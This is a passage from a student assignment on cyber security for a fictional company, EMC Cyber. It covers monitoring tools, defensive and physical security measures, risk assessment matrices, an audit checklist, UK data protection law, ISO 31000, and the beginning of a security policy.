A cloud-based SaaS infrastructure monitoring solution called Datadog Network Performance

Monitoring looks at network traffic flows. A network device monitoring service, which
focuses on the statuses of each network device, including switches, routers, and appliances, is
linked with it.

Key features:

 Live network mapping and protocol analysis

 Alerts on performance thresholds that are adjusted through machine learning
 Correlation with data from SNMP and other sources

The network monitoring efforts for several sites and cloud services may be combined using
the Network Performance Monitor. The monitoring software's CPU and storage space are
both included in the service as a SaaS package. This network monitoring service provides
packet capture and analysis tools in addition to live status updates.

49 | P a g e
 Figure 8 Datadog Network Performance Monitoring

PRTG Network Monitor

PRTG Network Monitor is a free network monitoring package that keeps an eye on your
network using SNMP, packet sniffing, and WMI. Search for and add devices to monitor by
scanning network segments. To keep an eye on different parts of your network, you may pick
from a variety of sensors. Each sensor tracks a different value within your network; for
example, there are sensors for bandwidth monitoring, hardware parameters, network data
utilisation, SNMP, VOIP, QoS, and more.

Key features:

 SNMP monitoring
 Bandwidth monitoring
 Scan for network devices by IP segment
 Custom dashboards
 Threshold-based alerts system
 Reports system
 Customizable network maps

50 | P a g e
 Figure 9 PRTG Network Monitor

Tools to improve the Security of EMC cyber

ENDPOINT PROTECTION

 Endpoint protection involves safeguarding data as it enters the system and monitoring
each system operation and file on an organization's endpoints. VPNs may also be used
to secure the communication paths connecting various network resources.
 The VPN technologies aid in the proactive identification of possible risks like
malware and ransomware. The desktop computers, laptops, and mobile devices that
have access to the company's network can be approved by the administrators.
Employees using endpoint protection on their systems may rely on public Wi-Fi
signals without increasing their risk exposure because VPNs encrypt data streams to
increase security.
 The endpoint should be secured since attacks against VPNs are more likely. It may be
challenging to determine whether the data is under assault since it can be coming from
a trustworthy system or source.
 Data is a significant commodity in any firm, and its loss might raise the likelihood of
that organisation going bankrupt. For this reason, endpoint protection is crucial. The
growing number of endpoints might make data security processes more difficult.

51 | P a g e
CLOUD-ENABLED SECURITY

 Cloud-enabled security is one of the best data security technologies for protecting
data. Organizations may get the best data security solutions without the need for extra
infrastructure or internal personnel by moving data to the cloud.
 Although cloud-based systems are affordable, effective, and accessible, they are
different in how they are made and not impervious to intrusions. Finding cloud
platforms and apps that provide the highest level of data protection is crucial.
 Because no software or hardware is needed with cloud solutions, data protection costs
are kept to a minimum. When implementing cloud data storage, rules like HIPAA and
PCI may provide some difficulties. Before deploying the cloud solution, businesses
should perform their research and make sure the storage is compliant. The assets of
enterprises are regularly and consistently supported by good cloud computing security
solutions, including live monitoring.

FIREWALLS

 The goal of firewalls is to track both incoming and outgoing network traffic. They can
use deep packet inspection (DPI) or other sophisticated analyses to network restrict or
permit specific network operations.
 Because they are simple to set up and have little effects on daily operations, firewalls
are often the first line of protection for many enterprises. Firewalls are not perfect
security technologies, just like many others.
 They are widespread, and even the most sophisticated firewalls may not detect any
attacks. Therefore, it is crucial to consider additional data security measures. Regular
assessments, user access protection, data backups, and other elements should be part
of the layered security.
 Data hacking is prevented via firewalls. Hacking dangers are increasing as more
corporate settings adopt digital strategies. An organisation is protected by a firewall
from any illegal connections and possible hackers. By enabling customers to develop
trust, they improve brand reputation by enhancing network security.

52 | P a g e
PASSWORDS

 Passwords are a cheap and effective way to safeguard data against unwanted access.
Making passwords strong and changing them frequently can increase their efficacy by
making it difficult for attackers to test them out and get access to the system.
 Users should be advised to choose complex passwords that are difficult to guess and
to not share them. The passwords should, however, be easily remembered so that
users won't need to record them.

Virtual Security Measures implemented by EMC Cyber

 Connection policies and address validation
o Real networks—typically IP networks like IP VPNs or the internet—ride on
top of virtual networks. Every virtual endpoint is also a real network endpoint,
and from the actual network or endpoint below, it is possible to attack or leap
onto the virtual network. It is erroneous to believe that virtual network
overlays will address security issues; the actual network must still be
protected.
o Generally, setting forwarding policies between subnetworks is necessary to
increase virtual network security. In IP networks, each subnet has a fixed
address range that connects all users and resources. Use filtering policies to
enact these restrictions at the subnet border if these subnets should only accept
connections with specific other subnets.
o To avoid spoofing, source address validation on packets is a crucial
component of virtual network security. Every packet in an IP network will
come from a subnetwork, and each member of the subnetwork is given an
address from a pool of addresses. The danger of intrusion through spoofing is
significantly reduced if the gateway device for the subnet examines the source
address of a packet to make sure it is within the subnet range.
 Secure gateway access between networks
o On-ramp security for virtual networks, which secures the points of entry
between networks and subnets, is a similar security issue.
o A virtual network often has several locations where its users may access
external resources like the internet and external users can use the resources of
the virtual network. To prevent illegal connections from being established at

53 | P a g e
 those connection points, this connectivity must be expressly supplied through
one or more virtual network gateways, which must enact access controls.
Hackers could be able to access the bigger corporate network through an open
link between a company's virtual network and the internet.
o A virtual network should only allow communication between specified access
points. Any effort to establish a direct link with the outside world at a different
node within the virtual network should be regarded as a security breach and
potentially as a hack, malware attack, or denial-of-service attack.
 Connection access control
o Because on-ramp connection regulations are intended to keep intruders out
rather than keep users in line, it is vital to recognise that restricting
communications to the outside won't eliminate the need for virtual network
access security. To prevent network users from unintentionally or deliberately
leaking data, more precise connection policy rules are essential. The options
available for connection security in virtual network systems differ greatly.
This is especially true with SD-WANs, which may supplement MPLS VPNs
by introducing new locations where MPLS is unavailable or too expensive to
establish. The proper SD-WAN deployment may significantly enhance
connection policy controls, which will enhance network security on a whole.
o However, as most SD-WAN implementations don't include incremental
connection security capabilities, users will need to set connection and access
control rules for network traffic on the IP network that lies beneath the SD-
WAN. Only a few SD-WANs give explicit session and connection restrictions
for all traffic, and only 15% of SD-WANs offer connection policy control.
o The most important development in IT and network security is explicit
connection management at the virtual network level. Most network security
tools today concentrate on preventing intrusions, which is useless against
insider threats, or persons who are legally allowed to access the network but
choose to abuse it. Enterprises may specify which users and resource sessions
they consider valid using explicit connection control, and all other connections
will be denied. Permissive connectivity, the current IP network assumption, is
replaced with explicit connection management. Although figuring out the
range of acceptable connections in advance may be burdensome to certain

54 | P a g e
 users, security management always requires something similar. The number of
rules that need to be defined may frequently be decreased by categorising
people and resources by role or subnet.

Physical Security Measures implemented by EMC Cyber

 Lock up the server room
o Make sure the server room door is securely locked before locking down the
servers, in fact, before turning them on for the first time. The finest lock in the
world won't do any good if we don't use it, therefore we also need policies
demanding that those doors be shut whenever the room is empty. The policies
should also specify who is in possession of the key or keycode to gain entry.
o Our physical network's heart is in the server room, where anybody with physical
access to the room's servers, switches, routers, cables, and other equipment
may cause a great deal of harm.
 Set up surveillance
o Locking the server room door is a nice first step, but someone may break in or
someone with access might abuse that power. EMC needs a solution to
monitor who enters and exits at what times. The simplest method to do this is
with a logbook for signing in and out, but this has several disadvantages.
Someone who has bad intentions will probably just ignore it.
o An authentication system built into the locking mechanisms would be
preferable to the logbook since it would need a smart card, token, or biometric
scan to unlock the doors and keep track of who enters.
 Make sure the most vulnerable devices are in that locked room
o Not simply the servers are a concern for EMC. A hacker can connect a laptop
to a hub and use sniffer software to record network traffic. Make sure as many
EMC Cyber network devices as you can are in that closed room, or if they
must be anywhere else in the facility, in a locked closet.
 Use rack mount servers
o In addition to occupying less space in the server room, rack mount servers are
also simpler to safeguard. Despite being smaller and maybe lighter than
(some) tower systems, they can nevertheless be quickly secured into closed

55 | P a g e
 racks that, once filled with numerous servers, can then be bolted to the floor,
making the whole thing nearly hard to move, much alone steal.
 Pack up the backups
o Backing up important data is an essential element in disaster recovery, but
don’t forget that the information on those backup tapes, disks, or discs can be
stolen and used by someone outside the company. Many IT administrators
keep the backups next to the server in the server room. They should be locked
in a drawer or safe at the very least. Ideally, a set of backups should be kept
off site, and you must take care to ensure that they are secured in that offsite
location.
o Don’t overlook the fact that some workers may back up their work on floppy
disks, USB keys, or external hard disks. If this practice is allowed or
encouraged, be sure to have policies requiring that the backups be always
locked up.

Activity 03
3.1 Discuss suitable risk assessment integrated enterprise risk management
procedures for EMC Cyber solutions and the impact an IT security audit will
have on safeguarding organization and its clients. Furthermore, your discussion
should include how IT security can be aligned with an organizational IT policy
and how misalignment of such a policy can impact on organization’s security.

Risk Assessment
What is Risk Assessment?
Risk assessment is the process of finding potential threats to a company's capacity to do
business. These analyses assist in identifying these inherent company risks and offer steps,
procedures, and controls to lessen their negative effects on daily operations.
To prioritise and communicate the contents of the evaluation, including any threats to their
information technology (IT) infrastructure, businesses might utilise a risk assessment
framework (RAF). The RAF assists an organisation in identifying prospective risks, any
company assets put at risk by these risks, as well as potential consequences should these risks
materialise.
The Chief Risk Officer (CRO) or a Chief Risk Manager is often in charge of conducting the
risk assessment process in major businesses.

56 | P a g e
Risk assessment Process
Depending on the risks particular to the type of business, the sector that business is in, and
the compliance regulations that are relevant to that specific business or industry, a risk
assessment is undertaken in a variety of ways. Regardless of the nature of their business or
sector, organisations may still use the following five generic processes.

 Step 1:  determine the dangers. Finding possible risks that, if they materialised, would
have a detrimental impact on the organization's capacity to conduct business is the
first stage in a risk assessment. Natural catastrophes, utility outages, cyberattacks, and
power outages are examples of potential risks that could be taken into account or
discovered during the risk assessment process.
 Step 2: Determine who or what might be harmed in step two. The next stage after
identifying the risks is to ascertain which company assets would be adversely affected
if the risk materialised. Critical infrastructure, IT systems, corporate operations, brand
reputation, and even staff safety might be considered business assets that are at danger
from these threats.
 Step 3: Assess the risks and create control strategies. A risk analysis can assist in
determining how risks will affect company assets and the steps that can be taken to
lessen or eliminate those risks' effects. Property destruction, company interruption,
financial loss, and legal repercussions are all examples of potential risks.
 Step 4: Summarize your results. The firm should document the results of the risk
assessment and save them in conveniently accessible formal papers. Details on
possible dangers, the risks they pose, and measures to prevent them should be
included in the records.
 Step 5: Consistently review and revise the risk assessment. In a modern company
context, potential risks, hazards, and the resultant controls may all change very
quickly. To keep up with these developments, it's critical for businesses to
periodically update their risk assessments.

57 | P a g e
Risk Assessment Framework
A risk assessment framework (RAF) is a method for ranking security hazards to an
information technology (IT) infrastructure and disseminating information about them.
Information should be organised and presented by a decent RAF so that both technical and
non-technical employees can understand it.

RAF has the three following important components:

 shared vocabulary
 consistent assessment methods
 reporting system

Common concepts and methods for risk assessment assist an organisation in determining
which systems are most or least vulnerable to abuse or assault. However, because risk
evaluations are so highly subjective, it is impossible to rely on them to consistently achieve
their goals. As a result, RAFs cannot be utilised in verification audits, compliance
evaluations, etc. because of their subjectivity.

However, the information offered by an RAF is helpful for anticipating future dangers,
preparing budgets, and developing a culture in which the importance of data is recognised.

Date Author Email Descriptio Purpose Guidanc Objective Securit

n e s y
And Admin
Standard
2022/10 M.A.S. E114762 Risk Identify NIST Identify M.A.S.
/ Jayath @ Assessme the risk Risk and Jayath
12 u esoft. nt assessme Finding u
academy Procedure nt and Solutions
finding (Risk
Solutions Matrix)

Risk Management Process

The steps that must be done are outlined in the risk management process. The risk
management process, which consists of these five fundamental components, is used to

58 | P a g e
manage risk. Starting with risk identification, it then moves on to risk analysis, risk
prioritisation, solution implementation, and risk monitoring. Each stage in manual systems
requires a significant amount of administration and paperwork.

 Identify the Risk

 Analyse the Risk
 Evaluate or Rank the Risk
 Treat the Risk
 Monitor and Review the Risk

Step 1: Identify the Risk

 Finding the risks to which the company is exposed in its operational environment is
the first stage in the risk management process.

Risks come in a wide variety of forms:

o Legal risks
o Environmental risks
o Market risks
o Regulatory risks etc.
 Most of these risk variables should be found, if at all feasible. In a manual setting,
these risks are manually recorded. All this information is entered immediately into the
system if the firm is using a risk management solution.

Step 2: Analyse the Risk

 A danger must be examined after being detected. Determine the risk's extent first.
Understanding the relationship between risk and other organisational characteristics is
also crucial. It is vital to look at how many business operations the risk affects to
gauge the risk's degree and severity. There are dangers that, if they materialise, might
put the entire firm at risk, while other hazards will, according to the research, merely
cause small annoyances.

Step 3: Evaluate the Risk or Risk Assessment

59 | P a g e
  It is necessary to rank and prioritise risks. Depending on the risk's intensity, most risk
management solutions contain multiple types of hazards. Risks that might result in
little discomfort are ranked lower than risks that could cause catastrophic loss, which
are rated highest. Ranking hazards is crucial because it gives the business a
comprehensive understanding of its overall exposure to risk. The company may be
exposed to several low-level hazards, but senior management may not need to become
involved. However, even one of the worst hazards is sufficient to warrant prompt
action.

Step 4: Treat the Risk

 It is essential to minimise or eliminate any risks. Connecting with subject-matter

specialists in the area where the risk is present enables this. In a manual setup, this
requires getting in touch with each stakeholder before scheduling meetings where
everyone may voice their concerns. The issue is that the conversation has been
fragmented into several email threads, various spreadsheets and papers, and numerous
phone conversations. A risk management solution allows for the system-wide
communication of all pertinent stakeholders.  The debate of the danger and potential
solutions can happen inside the system. Upper management can also keep a close eye
on the solutions being suggested and the progress being made within the system.
Instead of everyone contacting each other to get updates, everyone can get updates
directly from within the risk management solution.

Step 5: Monitor and Review the Risk

 Some hazards cannot be completely eradicated; they are always there. Among the
hazards that must continually be assessed are market risks and environmental threats.
Under manual methods, devoted staff do monitoring. These experts need to be careful
to keep a close eye on all risk variables. The risk management system keeps track of
the organization's whole risk framework in a digital setting. Everybody may see any
change in a factor or danger right away. Additionally, computers are significantly
better than people in continuously assessing threats. Your company can guarantee
continuity by keeping an eye on potential threats. We can explain to you how to
develop a risk management strategy to track and evaluate the risk.

60 | P a g e
Risk Impact and Probability Chart
The corners of the chart have these characteristics:

 Low impact/low probability – Risks in the bottom left corner are low level, and you
can often ignore them.
 Low impact/high probability – Risks in the top left corner are of moderate
importance – if these things happen, you can cope with them and move on. However,
you should try to reduce the likelihood that they'll occur.
 High impact/low probability – Risks in the bottom right corner are of high
importance if they do occur, but they're very unlikely to happen. For these, however,
you should do what you can to reduce the impact they'll have if they do occur, and
you should have contingency plans in place just in case they do.
 High impact/high probability – Risks towards the top right corner are of critical
importance. These are your top priorities and are risks that you must pay close
attention to

Figure 10 Risk Probability Chart

61 | P a g e
EMC Cyber Risk Impact and Risk Matrix
Risk Levels

Likelihoo Very Low Medium High Very

d of Low
High
(Very
incident
Unlikely)

IMPACT Very low 0 1 2 3 4

FOR Low 1 2 3 4 5
ORGANIZATION Medium 2 3 4 5 6
High 3 4 5 6 7
Very High 4 5 6 7 8

Risk Probability and Impacts

4 5 6 7 8

3 4 5 6 7

2 3 4 5 6

1 2 3 4 5

0 1 2 3 4

EMC CYBER RISK IMPACTS

62 | P a g e
Cyber Attacks

A cyberattack is any offensive manoeuvre that targets computer information systems,

computer networks, infrastructures, or personal computer devices.

Probability High
Impact High
Risk Hacked into the EMC Cyber System or
Network
Solution Keep EMC software and systems fully up to
date
Ensure Endpoint Protection.
Install a Firewall.
Backup EMC Cyber data.
Control access to EMC systems.
Wi-Fi Security.

 Cyber attacks can be stopped that comes to EMC Cyber by Protecting and
securing all the software and networks

Data Loss

Data loss is a type of error that occurs when information is lost due to mistakes made during
processing, transmission, or storage. To prevent data loss or to recover lost data, information
systems use technology and procedures for backup and disaster recovery.

Probability High
Impact High
Risk Hardware failure. A recent study showed
hardware failures are the most frequently
cited reason for data loss among businesses
and home users.
Human error (Accidental deletion)
Natural disasters.
Theft or loss.
Hackers and viruses.

63 | P a g e
 Solution Implement a data security plan.

Encrypt data.

Communicate data securely.

Use access controls and firewalls.

Use external service providers carefully.

Keep some data off the network

Unauthorized access

A person gains logical or physical access without permission to a network, system,

application, data, or other resource.

Probability Medium
Impact Medium
Risk Tailgating.
Door Propping.
Levering Doors.
Keys.
Access Cards
Solution Monitoring
Two factor authentication
Single sign on (SSO)
Keep Fingerprints
Ip Whitelisting

Equipment Theft

Theft is the act of taking another person's property or services without that person's
permission or consent with the intent to deprive the rightful owner of it.

64 | P a g e
 Probability Low
Impact Low
Risk Theft of computer equipment, tools,
devices, and other stuff from EMC Cyber
Solution Use Night-time Cameras, Motion Sensors,
and/or Light Towers

Hire Private Night Guards for After-Hours

Surveillance

Keep Employers Up to Date on Security

Practices

Move Your Equipment to a Safer Location

During Off-Hours

Immediately Report a Theft Upon

Discovery
Keep Records of All Equipment

Natural Disaster

"The adverse effect following an actual occurrence of a natural hazard in the event that it
considerably hurts a community" is what is meant by "natural catastrophe." A natural
catastrophe usually leaves behind some economic harm in addition to the potential for loss of
life or property damage.

Probability Medium
Impact Medium
Risk Hurricanes and tropical storms.
Landslides & debris flow.
Thunderstorms and lighting.
Tornadoes.
Tsunamis.
Wildfire.
Winter and ice storms.
Solution Map and avoid high-risk zones.

65 | P a g e
 Build hazard-resistant structures and houses.

Protect and develop hazard buffers (forests,

reefs, etc.)

Develop culture of prevention and

resilience.

Improve early warning and response

systems.
Build institutions, and development policies
and plans.

IT Security and Organizational Policy

IT security Audit
A security audit evaluates a company's information system's security systematically by
gauging how closely it adheres to predetermined standards. A comprehensive audit often
evaluates the security of the system's software, information handling procedures, user
behaviour, and physical setup and surroundings.

Security audits are frequently used to ascertain compliance with laws that stipulate how
businesses must handle information, such as the Health Insurance Portability and
Accountability Act, the Sarbanes-Oxley Act, and the California Security Breach Information
Act.

Along with vulnerability analyses and penetration testing, these audits are one of the three
primary categories of security diagnostics. Security audits compare the effectiveness of an
information system to a set of standards. An extensive examination of an information system
to identify potential security flaws is known as a vulnerability assessment. A security
specialist will use a covert technique called penetration testing to check a system's resistance
to a particular assault. Each strategy has its own advantages, and the most successful strategy
may include combining two or more of them.

Cybersecurity Audit Benefits

66 | P a g e
  1) Ensure Your Data is Protected.
 2) View Operations from A New Angle.
 3) Identify Gaps in Your Protection.
 4) Stay Ahead of Regulations.
 5) Use Recommendations to Improve.

Organizational Policy

A set of limitations is called a company policy. To impose the limitations on that resource
and its offspring, you, as the organisation policy administrator, construct an organisation
policy and set it on organisations, folders, and projects.

Organizational Policy Advantages

 provide rules and guidelines for decision-making in routine situations

 provide a consistent and clear response across the company in dealing with situations
 demonstrate your good faith that workers will be treated fairly and equally
 provide an accepted method of dealing with complaints and misunderstandings to
help avoid claims of bias and favouritism
 provide a clear framework for the delegation of decision-making
 provide a means of communicating information to new workers; and
 ensure that you are better equipped to defend claims of a breach of employer
obligations, e.g., health and safety legislation.

What is security misalignment?

 Unfortunately, these hasty judgments frequently result in security strategy

misalignment, which has detrimental effects on the organisation that frequently
resemble those of data breaches.

How Misalignment Impact on organization’s Security?

 Adverse experiences for legitimate prospect/customer traffic

 Overwhelmed security teams

 Siloed data and lack of knowledge

 Cumbersome technology and business resistance

67 | P a g e
  Underutilized solutions and exposed applications

Security Audit
Date Admin Email Purpose
2022/10/12 Sahan jayathu [email protected] Security audit

Info Description yes no

Organizational Are the IT roles and Duties outlined int EMC 
policy and Organizational Structure?
procedure
Are server administrator skilled? 
Does organizational policy affect for everyone? 
Are your employees familiar with existing security 
procedures and policies?

Does the document communicate executive 

direction such as vision, mission, values, or
objectives?
Access control Does an access control baseline exist that documents 
the permissions necessary for each data set?
Are access privileges in organisation granted 
adequately?
Have users only been assigned the appropriate 
permissions to the data sets necessary to complete
their job requirements?
Do proper authorizations exist for each user granted 
rights to each of the organization’s data sets?
Does an automated validation process exist to ensure 
that only proper users have the proper rights to each
data set?
Does an access control baseline exist for all data sets 
that details the appropriate permissions for each user

68 | P a g e
 who needs access to the resource?
Security Do you have a disaster recovery plan? 
Does your organisation have cyber security policies 
and procedures in place?

Does your organisation protect all sensitive 

information transmissions?

Are all devices protected from the internet by 

a firewall?

Does your organisation have designated cyber 

security professional?

Does your organisation have a cyber security user 

education and awareness program?

3.2 Explain the mandatory data protection laws and procedures which will be applied to
data storage solutions provided by EMC Cyber. You should also summarize ISO 31000
risk management methodology.

Data protection provided to safeguard the information from corruption, compromise, or loss.
EMC Cyber is the Cyber Security Company That Secure Client Every day from Cyber
Threats, Risks and Attacks. Large part of a data protection strategy is ensuring that data can
be restored quickly after any corruption or loss because The EMC Cyber must responsibility
to client data also why the Data protection would be in EMC Cyber. EMC Cyber is tasked
with protecting companies’ networks, clouds, web applications and emails. They also offer
advanced threat protection, secure unified access, and endpoint security. Further they also
play the role of consulting clients on security threats and how to solve them.

Data protection and privacy laws

69 | P a g e
System design must take a comprehensive approach to data protection and include
administrative, technological, and legal precautions. To begin with, legislative frameworks
that protect user rights, personal information, and privacy should serve as the foundation for
ID systems. The ID system and other government or private-sector initiatives that process
personal data are covered by general data protection and privacy legislation that many nations
have implemented. These laws often contain wide regulations and guidelines relating to the
gathering, storing, and use of personal information, in conformity with international standards
on privacy and data protection, such as:

 Purpose limitation: Personal data should only be collected and used for the
following reasons: those that are permitted by law and so, at least theoretically, can be
known by the data subject at the time of collection; or those that the data subject has
consented to.
 Proportionality and minimization: To prevent unneeded data gathering and "feature
creep," both of which can cause privacy problems, the data acquired must be in
proportion to the goal of the ID system. This is frequently stated as necessitating the
collection of "minimum essential" data, which includes transaction information, to
achieve the desired results.
 Lawfulness: Personal data should only be collected and used when necessary and on
legal grounds, such as those involving consent, contractual requirements, legal
compliance, protection of vital interests, public interest, and/or legitimate interest.
 Fairness and transparency: Personal information should be gathered and used fairly
and openly.
 Accuracy: Personal information must be current and accurate, and any errors must be
quickly fixed.
 Storage limitations: Personal data—including transaction metadata—should not be
kept longer than is necessary for the purposes for which it is collected and processed.
With respect to transaction metadata, people can be given an option for how long such
data are retained.
 Privacy-enhancing technologies (PETs): Requirements to use technologies that
protect privacy (e.g., the tokenization of unique identity numbers) by eliminating or
reducing the collection of personal data, preventing unnecessary or undesired
processing of personal data, and facilitating compliance with data protection rules.

70 | P a g e
  Accountability: The processing of personal data in accordance with the above
principles should be monitored by an appropriate, independent oversight authority,
and by data subjects themselves.

Data protection laws and procedures

Data protection Act of 1998.
Computer misuse Act of 1990.

Data protection Act of 1998.

The Data Protection Act of 1998 (DPA, c. 29), an act of the British Parliament, was created
to safeguard personal data kept on computers or in a well-organized paper file system. It
adopted guidelines for the storage, processing, and transfer of data from the 1995 European
Union (EU) Data Protection Directive.

Individuals had legal rights to manage information about themselves under the 1998 DPA.
The vast majority of the Act did not apply to residential usage, including maintaining a
personal address book. Subject to certain exceptions, anybody who holds personal data for
other reasons is required by law to adhere to this Act. To guarantee that information was
treated legitimately, the Act established eight data protection principles.

On May 23, 2018, the Data Protection Act of 2018 (DPA 2018) replaced it. The EU General
Data Protection Regulation (GDPR), which went into effect on May 25, 2018, is
supplemented by the DPA 2018. The GDPR imposes far stricter rules on the gathering,
holding, and usage of personal data.

Data Protection Act 1998 principles

The 8 guiding principles of the Act are as follows:

 Principle 1 - Fair and Lawful

 Principle 2 - Purposes
 Principle 3 - Adequacy
 Principle 4 - Accuracy
 Principle 5 - Retention
 Principle 6 - Rights

71 | P a g e
  Principle 7 - Security
 Principle 8 - International transfers

Principle 1 - Fair and Lawful

Regarding persons, personal data should be managed and treated legally and equitably. The
Act includes a fair processing notice that obliges the controller to inform the subject of the
following information:

 The identity of the data controller

 The purposes for which the personal data are intended to be processed
 To whom the personal data may be disclosed to.

Individuals were granted the right to have their personal information treated fairly and legally
by any organisation under the first data protection principle.

Principle 2 - Purposes

Only collect personal information if it will be use legally. It shouldn't be processed using any
methods that aren't appropriate for the goal.

The controller is required under the second data protection principle to only use personal data
for legitimate and legal purposes.

Principle 3 - Adequacy 

Only personal information that is necessary for the intended usage should be collected. It
must not be excessive for the intended application.

The controller is obligated to only gather the necessary information under the third data
protection principle.

Principle 4 - Accuracy  

Personal information needs to be current and correct. Personal information can no longer be
utilised for the intended purpose if it is erroneous.

The controller must only gather, store, and maintain accurate information about the
individual, according to the fourth data protection principle.

72 | P a g e
 Principle 5 - Retention

Personal information shouldn't be stored any longer than necessary. Personal information
cannot be kept on file forever unless it is needed.

The controller's ability to store a person's personal information for an extended period of time
is constrained by the fifth data protection principle.

Principle 6 - Rights 

Individual rights should be respected while processing personal data. The following rights are
mentioned in the legislation:

o Access to personal data

o Preventing process likely to cause damage or distress
o Prevent direct marketing
o Automated decision making
o Correcting inaccurate personal data
o Compensation

Individuals were granted the right to control how their personal data was used under the sixth
data protection principle. People now have control over how businesses that information
about them had utilised that information in their operations.

Principle 7 - Security 

To preserve both the integrity of personal data and people's rights and freedoms, personal
information should be safeguarded using reasonable and useful measures. According to the
Act, controllers must take action to prevent the following:

o Unauthorised processing of personal data

o Unlawful processing of personal data
o Accidental destruction, damage, or loss to personal data

The controller is required by law to protect data from unauthorised or illegal processing as
well as accidental loss or destruction under the seventh data protection principle.

73 | P a g e
 Principle 8 - International transfers 

To safeguard the rights and freedoms of data subjects and their personal data, personal data
should not be transferred beyond the EU unless the nation to which it is being transferred can
assure effective protection of the data.

According to the eighth data protection principle, the controller must notify the person when
they intend to transfer personal data abroad and make sure the destination nation has suitable
data protection regulations in place.

Computer Misuse Act of 1990

The Computer Misuse Act of 1990 was passed by the British Parliament, in part as a reaction
to the ruling in R v. Gold & Schifreen (1988) 1 AC 1063. (See below). The bill's
detractors[who?] said that it was poorly thought out and hurriedly proposed. They[who?] said
that it was frequently impossible to establish intent and that the law did not effectively
distinguish between "joyriding" hackers like Gold and Schifreen and serious cybercriminals.
The Act is still regarded as "a solid and adaptable piece of legislation in terms of dealing with
cybercrime," and numerous other nations, notably Canada and the Republic of Ireland, have
used it as a model when developing their own information security laws. Several amendments
have been passed to keep the Act up to date.

ISO 31000 Risk Management Methodology

An international standard known as ISO 31000 was released in 2009 (and revised in 2018)
and offers concepts and recommendations for efficient risk management. It presents a general
approach to risk management that may be utilised by any kind of company and applied to
various risks (financial, safety, and project risks). The standard gives discussion of risk
management a consistent terminology and ideas. It offers concepts and recommendations that
might aid in conducting an evaluation of your organization's risk management procedure.

The standard stays at a generic level and does not include specific requirements or directions
on how to handle certain risks. It also does not offer any guidance about a particular
application area.

74 | P a g e
The 31000 standards for risk management innovates in several ways when compared to
earlier standards:

 It offers a new definition of risk that emphasises the impact of uncertainty on the
likelihood of the company accomplishing its goals, the significance of setting goals
before attempting to control risks, and the significance of ambiguity

 It introduces the (often contentious) concept of "risk appetite," which is the degree of
risk that an organisation would accept in exchange for predicted benefits.
 It establishes a framework for risk management with various organisational practises,
roles, and duties.
 It is a management philosophy in which risk management is viewed as a crucial
component of making strategic decisions and managing change.

The following actions are part of the risk management process described in the ISO 31000
standard:

 Risk identification:  determining what would make it difficult for us to accomplish

our goals.
 Risk analysis: Knowing the causes and origins of the risks that have been discovered;
analysing the likelihoods and outcomes considering the current controls to determine
the amount of residual risk.
 Risk evaluation: To assess if the residual risk is bearable, risk criteria and risk
analysis findings are compared.
 Risk treatment: adjusting the scope and likelihood of both positive and negative
effects to maximise net benefit.
 Establishing the context:  this activity, which was left out of earlier formulations of
the risk management process, include identifying the goals of the company, the scope
of the risk management process, and the standards for evaluating risks. The context is
made up of internal and external factors, including the governance, culture, norms and
regulations, capabilities, current contracts, worker expectations, information systems,

75 | P a g e
 and market and stakeholder circumstances as well as stakeholder expectations and the
regulatory environment.
 Monitoring and review: Measurement of risk management performance against
indicators that are periodically assessed for appropriateness constitutes this activity. It
entails reviewing the effectiveness of the risk management framework, reporting on
risk, progress made with the risk management plan, and how well the risk
management policy is being followed, as well as looking for deviations from the risk
management plan and determining whether the risk management framework, policy,
and plan are still appropriate given the external and internal context of the
organisation.
 Communication and consultation: Understanding the interests and concerns of
stakeholders is important for ensuring that the risk management process is
concentrating on the relevant factors and for providing justification for choices and
specific risk treatment alternatives.

Figure 11 ISO 31000 Risk Management

76 | P a g e
The standard includes several principles that risk management should verify:

 creates and protects value

 is based on the best information
 is an integral part of organizational processes
 is tailored
 is part of decision-making
 takes human and cultural factors into account
 explicitly addresses uncertainty
 is transparent and inclusive
 is systematic, structured, and timely
 is dynamic, iterative, and responsive to change
 facilitates continual improvement of the organization

Activity 04
4.1 Design an organizational security policy for EMC Cyber to minimize exploitations
and misuses while evaluating the suitability of the tools used in an organizational policy.

Security Policy
What is a Security Policy?
For a system, organisation, or other entity, a security policy defines what it means to be
secure. It addresses the behavioural restrictions placed on an organization's members as well
as the restrictions placed on enemies by devices like walls, doors, locks, and keys. The
security policy for systems addresses restrictions on the functions and communication
between them, restrictions on access by external systems and enemies, including
programmes, and restrictions on human access to data.

If security is crucial, then it's important to make sure that all security policies are
implemented by robust procedures. To ensure that security rules are comprehensive and well
enforced, there are established techniques and risk assessment strategies. Policies in complex
systems, like information systems, can be divided into sub-policies to make it easier to assign
security measures to enforce the sub-policies. This method, though, has drawbacks. It is far
too simple to skip the top-level policy and get right to the sub-policies, which are effectively

77 | P a g e
the operating procedures. Although they do not, this provides the impression that the rules of
operation address some broad meaning of security. Rules of operation described as "sub-
policies" without a "super-policy" typically end up being meandering rules that fail to enforce
anything with completeness since it is so difficult to understand clearly and completely about
security. Therefore, a top-level security policy is necessary for any real security scheme, and
without it, sub-policies and operational guidelines are useless.

Importance of security policy

 Guides the implementation of technical controls
o A security policy outlines the intents and expectations of senior management
about security, but it does not offer precise low-level technical assistance. The
security or IT teams are then responsible for translating these ideas into
precise technological actions.
 Sets clear expectations
o Without a security policy, it will be up to each employee or user to exercise
their own discretion to determine what is and is not acceptable. When various
personnel use different standards, this may be disastrous.
 Helps meet regulatory and compliance requirements
o Legislation like HIPAA and Sarbanes-Oxley, as well as rules and standards
like PCI-DSS, ISO 27001, and SOC2, all call for the documentation of
security policies. A security policy is frequently a practical need in developing
a plan to comply with ever-stricter security and data privacy regulations, even
when it is not officially mandated.
 Improves organizational efficiency and helps meet business objectives
o The effectiveness of a company may be increased with a sound security
policy. Because of its policies, everyone is on the same page, there is no need
for duplicate work, and compliance is consistently monitored and enforced.
Security policies should be very specific about when and by whom policy
exceptions are to be allowed.

78 | P a g e
EMC Cyber Security Policy
Company Description

‘EMC Cyber’ is a reputed cyber security company based in Colombo Sri Lanka that is
delivering security products and services across the entire information technology
infrastructure. The company has several clients both in Sri Lanka and abroad, which includes
some of the top-level companies of the world serving in multitude of industries. The
company develops cyber security software including firewalls, anti-virus, intrusion detection
and protection, and endpoint security. EMC Cyber is tasked with protecting companies’
networks, clouds, web applications and emails. They also offer advanced threat protection,
secure unified access, and endpoint security. Further they also play the role of consulting
clients on security threats and how to solve them. Additionally, the company follows
different risk management standards depending on the company, with the ISO 31000 being
the most prominent.

Policy Description

All workers of the organisation must get a copy of this policy document, which covers
all facets of protection around secret corporate information. All workers of the
